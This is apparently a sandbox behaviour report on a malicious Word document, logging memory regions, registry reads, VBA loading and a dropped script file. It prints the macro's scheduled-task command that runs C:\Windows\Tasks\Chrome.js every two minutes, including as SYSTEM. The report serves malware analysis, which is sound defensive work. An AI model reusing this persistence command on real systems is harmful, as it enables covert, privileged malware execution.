b22d7b196ca03b43f9b140732a3d317f328e5d5f53379c2520a0f05a17d6e617 (SHA256)
CV gui PVN vv y kien cua UB ve gia han.doc
Word Document
Created at 2019-01-08 12:39:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
557
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:38, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:51, Reason: Self Terminated |
| Monitor Duration | 00:03:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8cc |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A08
0x
978
0x
93C
0x
938
0x
934
0x
930
0x
92C
0x
928
0x
924
0x
920
0x
91C
0x
918
0x
914
0x
910
0x
90C
0x
8E8
0x
8E4
0x
8E0
0x
8D8
0x
8D4
0x
8D0
0x
A30
0x
AA4
0x
AB4
0x
BB8
0x
A40
0x
8B0
0x
968
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00143fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00301fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00310fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x00320fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00331fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00341fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00770fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x01b7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b80000 | 0x01e4efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001e50000 | 0x01e50000 | 0x02242fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002250000 | 0x02250000 | 0x02252fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002260000 | 0x02260000 | 0x02261fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x0236ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0237ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000002380000 | 0x02380000 | 0x02382fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002390000 | 0x02390000 | 0x02392fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002410000 | 0x02410000 | 0x024eefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002500000 | 0x02500000 | 0x0250ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002510000 | 0x02510000 | 0x0270ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02710000 | 0x027cffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0286ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x02930fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002940000 | 0x02940000 | 0x02940fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002950000 | 0x02950000 | 0x02951fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02960000 | 0x0296bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02970000 | 0x02977fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02980000 | 0x0298ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a90000 | 0x02a90000 | 0x02a90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002aa0000 | 0x02aa0000 | 0x02b9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002ba0000 | 0x02ba0000 | 0x02ba0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002bb0000 | 0x02bb0000 | 0x02bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002bc0000 | 0x02bc0000 | 0x02bc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002bd0000 | 0x02bd0000 | 0x02bd4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02be0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x02bf0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c00000 | 0x02c00000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c10000 | 0x02c10000 | 0x02c11fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x02c20000 | 0x02c20fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02caffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02cb0000 | 0x02ccffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002cd0000 | 0x02cd0000 | 0x02cdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002ce0000 | 0x02ce0000 | 0x02ce0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002cf0000 | 0x02cf0000 | 0x02cf1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002d00000 | 0x02d00000 | 0x02d00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002f60000 | 0x02f60000 | 0x02fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fe0000 | 0x02fe0000 | 0x02fe1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ff0000 | 0x02ff0000 | 0x030effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030f0000 | 0x030f0000 | 0x030f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003100000 | 0x03100000 | 0x031fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003200000 | 0x03200000 | 0x032fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003300000 | 0x03300000 | 0x036fffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003700000 | 0x03700000 | 0x037fffff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x03800000 | 0x03810fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003840000 | 0x03840000 | 0x0393ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003940000 | 0x03940000 | 0x03a3ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x03a40000 | 0x03abefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003ad0000 | 0x03ad0000 | 0x03bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c30000 | 0x03c30000 | 0x03d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d60000 | 0x03d60000 | 0x03d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003db0000 | 0x03db0000 | 0x03eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f10000 | 0x03f10000 | 0x03f8ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003f90000 | 0x03f90000 | 0x0438ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004400000 | 0x04400000 | 0x044fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004500000 | 0x04500000 | 0x04842fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x0490ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004970000 | 0x04970000 | 0x04a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0513ffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x05140000 | 0x051eafff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000051f0000 | 0x051f0000 | 0x052effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000052f0000 | 0x052f0000 | 0x05aeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| staticcache.dat | 0x05af0000 | 0x0641ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006420000 | 0x06420000 | 0x06c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006c20000 | 0x06c20000 | 0x07c1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000007cb0000 | 0x07cb0000 | 0x07d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007e00000 | 0x07e00000 | 0x07efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007fa0000 | 0x07fa0000 | 0x0801ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000080d0000 | 0x080d0000 | 0x0814ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008150000 | 0x08150000 | 0x0854ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008690000 | 0x08690000 | 0x0878ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008790000 | 0x08790000 | 0x08b90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008ba0000 | 0x08ba0000 | 0x08fa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008fb0000 | 0x08fb0000 | 0x093b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000093c0000 | 0x093c0000 | 0x095bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000095c0000 | 0x095c0000 | 0x0a5c0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000000a5d0000 | 0x0a5d0000 | 0x0a9cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037a30000 | 0x37a30000 | 0x37a3ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037c80000 | 0x37c80000 | 0x37c8ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x751b0000 | 0x751e2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77e10000 | 0x77e12fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13f690000 | 0x13f86bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febdd50000 | 0x7febdd50000 | 0x7febdd5ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febfb90000 | 0x7febfb90000 | 0x7febfb9ffff | Private Memory | rwx |
|
|
|
- |
| ivy.dll | 0x7fee4be0000 | 0x7fee4e34fff | Memory Mapped File | rwx |
|
|
|
- |
| chart.dll | 0x7fee4e40000 | 0x7fee5c15fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x7fee5c20000 | 0x7fee5d93fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x7fee5da0000 | 0x7fee5eb9fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee5ec0000 | 0x7fee615afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee6290000 | 0x7fee6328fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee6330000 | 0x7fee639efff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee63a0000 | 0x7fee651dfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee6520000 | 0x7fee66effff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fee66f0000 | 0x7fee688cfff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee6890000 | 0x7feeac76fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feeac80000 | 0x7feeb974fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb980000 | 0x7feebdbcfff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7feebdc0000 | 0x7feebea1fff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feebeb0000 | 0x7feed8dbfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed8e0000 | 0x7feee586fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feee590000 | 0x7feef05efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feef060000 | 0x7feef743fff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7feef750000 | 0x7feefbf2fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7feefc00000 | 0x7feefc9bfff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x7feefca0000 | 0x7fef0c24fff | Memory Mapped File | rwx |
|
|
|
- |
| wwlib.dll | 0x7fef0c30000 | 0x7fef3408fff | Memory Mapped File | rwx |
|
|
|
- |
| msointl30.dll | 0x7fef3410000 | 0x7fef3420fff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fef3430000 | 0x7fef34effff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7fef3620000 | 0x7fef36aafff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7fef36b0000 | 0x7fef3775fff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x7fef4d40000 | 0x7fef4d5bfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 253 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Windows\Tasks\Chrome.js | 3.17 KB |
MD5:
c98b305f90a412362e54fd297afb3674
SHA1: 4705c1151fe5db668f2a3e9f84d78bf63a018555 SHA256: 31467c1f93ba3f47e5343d5c4b3899533d3270bee868831016b8c4aee3e6cc6f SSDeep: 48:XPlZP0/tdyoNWbdmjpQ11gC9WlB4lLdyTlpL+JKyfNayAT7W1nM7jlcqKJqmTdzq:XPySoQUjpQ1Uam7wKyf8Z/EwjRadu |
|
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | Scripting.FileSystemObject | IUnknown | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Tasks\Chrome.js | - |
|
1 |
Registry (71)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 193, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 1 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = AutoIndent, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = FullModuleView, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = IndicatorBar, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = SyntaxChecking, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = EndProcLine, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = DragDropInEditor, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = AutoStatement2, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = AutoQuickTips2, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = AutoValueTips2, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = TabWidth, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = OBSearchHeight, data = 4, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = OBGroupMembers, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CodeForeColors, data = 31, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CodeBackColors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = IndicatorColors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = FontCharSet, data = 49, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = FontHeight, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = FontFace, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA | value_name = DisableOrpcDebugging7, data = 0 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd /c schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /F & schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /RU SYSTEM | os_pid = 0xa34, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 |
Module (174)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc690000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee3fb0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fef90e0000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feffd80000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee4790000 |
|
18 | |
| Get Handle | c:\program files\microsoft office\root\office16\winword.exe | base_address = 0x13f690000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fefa750000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x77a20000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feffd80000 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x7feffa40000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
4 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fefa7cf088 |
|
1 | |
